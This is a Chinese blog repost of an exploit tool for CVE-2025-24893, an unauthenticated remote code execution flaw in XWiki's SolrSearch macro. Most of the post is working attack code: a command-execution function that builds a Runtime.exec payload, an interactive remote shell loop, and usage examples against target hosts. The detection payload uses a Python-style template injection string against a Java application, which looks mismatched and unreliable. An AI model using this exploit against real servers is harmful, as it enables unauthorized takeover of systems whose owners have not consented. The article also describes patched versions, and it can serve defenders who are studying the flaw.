news 2026/4/23 23:01:02

CVE-2025-24893 - XWiki 未授权远程代码执行漏洞检测与利用工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2025-24893 - XWiki 未授权远程代码执行漏洞检测与利用工具

CVE-2025-24893 - XWiki未授权RCE漏洞检测工具

📋 项目描述

这是一个针对CVE-2025-24893漏洞的检测与利用工具。CVE-2025-24893是一个影响XWiki平台的严重远程代码执行漏洞,允许未经身份验证的攻击者在目标系统上执行任意代码。该漏洞源于SolrSearch宏中的Groovy代码不安全评估,导致服务器端代码执行。

⚠️ 重要声明:本工具仅供授权的安全测试和教育目的使用。未经授权的使用是非法行为。

✨ 功能特性

  • 漏洞检测:自动检测目标XWiki实例是否存在CVE-2025-24893漏洞
  • 命令执行:支持在漏洞存在时执行系统命令
  • 交互模式:提供交互式shell界面进行多命令操作
  • 安全检测:使用无害的命令进行初步漏洞验证
  • 多平台支持:支持多种XWiki版本(5.3-milestone2至15.10.10,16.0.0-RC1至16.4.0)

📦 安装指南

系统要求

  • Python 3.x
  • requests库
  • 网络访问权限

安装步骤

  1. 确保系统已安装Python 3.x
  2. 安装必要的依赖:
pipinstallrequests
  1. 下载脚本文件:
gitclone https://github.com/B1ack4sh/Blackash-CVE-2025-24893.gitcdBlackash-CVE-2025-24893

🚀 使用说明

基础用法

# 1. 仅检测漏洞python3 cve-2025-24893.py http://your-lab-xwiki:8080# 2. 执行单条命令python3 cve-2025-24893.py http://target:8080whoami# 3. 进入交互模式python3 cve-2025-24893.py http://target:8080

使用示例

  1. 漏洞检测
python3 cve-2025-24893.py http://192.168.1.100:8080/
  1. 执行命令
python3 cve-2025-24893.py http://192.168.1.100:8080/"ls -la"
  1. 交互模式
python3 cve-2025-24893.py http://192.168.1.100:8080/ RCE $>whoamiRCE $>idRCE $>exit

注意事项

  • 仅在拥有所有权或获得明确授权的目标上使用
  • 使用前确保了解相关法律法规
  • 建议在测试环境中验证功能

💻 核心代码

1. 漏洞检测函数

defcheck_vulnerable(target):""" 检测目标XWiki实例是否存在CVE-2025-24893漏洞 Args: target: 目标URL Returns: bool: 如果存在漏洞返回True,否则返回False """url=f"{target.rstrip('/')}/bin/get/Main/SolrSearch"# 使用Python代码注入进行检测params={"search":"{{''.__class__.__mro__[1].__subclasses__()[414]('id', shell=True, capture_output=True).communicate()}}"}try:# 发送检测请求r=requests.get(url,params=params,timeout=15,verify=False,allow_redirects=False)# 检查响应中是否包含命令执行结果ifr.status_code==200and("uid="inr.textor"gid="inr.text):print("[+] VULNERABLE! Command output detected:")print(" "+r.text.strip().replace("\n","\n "))returnTrueelse:print("[-] Not vulnerable or command didn't return output.")returnFalseexceptExceptionase:print(f"[!] Request failed:{e}")returnFalse

2. 命令执行函数

defexecute_command(target,command):""" 在存在漏洞的目标上执行系统命令 Args: target: 目标URL command: 要执行的系统命令 """# Groovy RCE payload构造payload=f"#set($ex=$class.inspect('java.lang.Runtime').getRuntime().exec('{command}'))"payload+="#set($out=$ex.waitFor())#set($null=$ex.getInputStream().close())"# URL编码payloadencoded=urllib.parse.quote(payload,safe='')url=f"{target.rstrip('/')}/bin/get/Main/SolrSearch?search={encoded}&outputSyntax=plain"try:# 发送命令执行请求r=requests.get(url,timeout=20,verify=False,allow_redirects=False)ifr.status_code==200:print(f"[+] Command executed:{command}")print(f" Output:\n{r.text.strip()}")else:print(f"[-] HTTP{r.status_code}- No output or blocked")exceptExceptionase:print(f"[!] Error:{e}")

3. 主程序入口

if__name__=="__main__":# 显示工具bannerbanner()# 检查命令行参数iflen(sys.argv)<2:print("Usage: python3 cve-2025-24893.py http://xwiki-target.com [command]")print("Example: python3 cve-2025-24893.py http://192.168.1.100:8080/ whoami")sys.exit(1)target=sys.argv[1]print(f"[*] Target:{target}")# 步骤1: 漏洞检测(非破坏性)ifnotcheck_vulnerable(target):print("[*] Trying alternative detection...")# 回退检测方法:执行无害的ping命令execute_command(target,"ping -c 1 127.0.0.1")else:print("[+] Confirmed vulnerable!")# 步骤2: 交互模式或单命令执行iflen(sys.argv)>=3:cmd=" ".join(sys.argv[2:])execute_command(target,cmd)else:print("\n[+] Interactive shell mode (type 'exit' to quit)")whileTrue:try:cmd=input("RCE $> ")ifcmd.lower()in["exit","quit"]:breakifcmd.strip():execute_command(target,cmd)exceptKeyboardInterrupt:print("\nBye!")break

4. Banner显示函数

defbanner():""" 显示工具的ASCII艺术banner和基本信息 """print(r""" ██████╗ ██╗ █████╗ ██████╗ ██╗ ██╗ █████╗ ███████╗ ██╗ ██╗ ██╔══██╗ ██║ ██╔══██╗ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔════╝ ██║ ██║ ██████╔╝ ██║ ███████║ ██║ █████╔╝ ███████║ ███████╗ ███████║ ██╔══██╗ ██║ ██╔══██║ ██║ ██╔═██╗ ██╔══██║ ╚════██║ ██╔══██║ ██████╔╝ ███████╗ ██║ ██║ ╚██████╗ ██║ ██╗ ██║ ██║ ███████║ ██║ ██║ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝ CVE-2025-24893 Critical XWiki Remote Code Execution Vulnerability """)print(" Educational PoC - Only for authorized security testing!\n")

📊 受影响版本

❌ 受影响版本

XWiki版本系列受影响范围
5.x → 15.x5.3-milestone2 → 15.10.10
16.x16.0.0-RC1 → 16.4.0

✅ 已修复版本

安全版本说明
15.10.11LTS修复版本
16.4.1稳定分支修复
16.5.0-RC1开发分支修复

🔧 技术细节

漏洞组件

SolrSearch宏 → RSS渲染 → 用户控制文本的不安全评估

根本原因

  • ❌ 用户输入的不正确清理
  • ❌ Groovy代码动态评估
  • 导致CWE-94 + CWE-95(代码生成/评估注入)

漏洞利用

攻击者通过构造恶意搜索请求来滥用模板渲染功能,从而在服务器端执行任意代码。该漏洞已被用于真实攻击中部署恶意软件,如加密货币挖矿程序。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAP/Jlw6Em+eCYkkivuRs1AH
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 4:14:10

Jasminum插件终极调试指南:5步解决中文文献管理难题

作为Zotero平台上最受欢迎的中文文献管理插件&#xff0c;Jasminum通过智能元数据抓取和PDF处理功能&#xff0c;为学术研究者提供了强大的中文文献支持。然而&#xff0c;在日常使用过程中&#xff0c;用户可能会遇到各种功能异常和兼容性问题。本指南将为你提供完整的调试解决…

作者头像 李华
网站建设 2026/4/16 14:51:16

特斯拉又打脸国内车企了,开除鼓吹加班的人,消费者拍手称快!

国内车企与特斯拉方方面面都被拿来比较&#xff0c;而日前特斯拉就因为一件事再次得到国内大众的欢迎&#xff0c;狠狠打脸了国内车企&#xff0c;特斯拉要赢不靠员工加班&#xff0c;而是靠实实在在的技术和产品&#xff0c;这让诸多国内车企无地自容&#xff01;据悉特斯拉鼓…

作者头像 李华
网站建设 2026/4/22 15:20:40

终极iOS个性化定制指南:Cowabunga Lite免越狱美化全攻略

想让你的iPhone界面焕然一新却担心越狱风险&#xff1f;Cowabunga Lite作为专为iOS 15设备设计的系统定制工具&#xff0c;通过创新的动态配置技术&#xff0c;让普通用户也能轻松实现专业级的个性化设置。本指南将从实际使用场景出发&#xff0c;带你快速掌握这款强大工具的操…

作者头像 李华
网站建设 2026/4/22 22:11:07

终极指南:如何用BBDown轻松下载B站视频

终极指南&#xff1a;如何用BBDown轻松下载B站视频 【免费下载链接】BBDown Bilibili Downloader. 一款命令行式哔哩哔哩下载器. 项目地址: https://gitcode.com/gh_mirrors/bb/BBDown 在信息爆炸的时代&#xff0c;B站作为中国领先的视频平台&#xff0c;汇聚了海量的学…

作者头像 李华
网站建设 2026/4/22 22:10:15

Windows Cleaner完全手册:免费开源工具彻底解决C盘空间不足难题

Windows Cleaner完全手册&#xff1a;免费开源工具彻底解决C盘空间不足难题 【免费下载链接】WindowsCleaner Windows Cleaner——专治C盘爆红及各种不服&#xff01; 项目地址: https://gitcode.com/gh_mirrors/wi/WindowsCleaner 还在为Windows系统C盘空间告急而焦虑吗…

作者头像 李华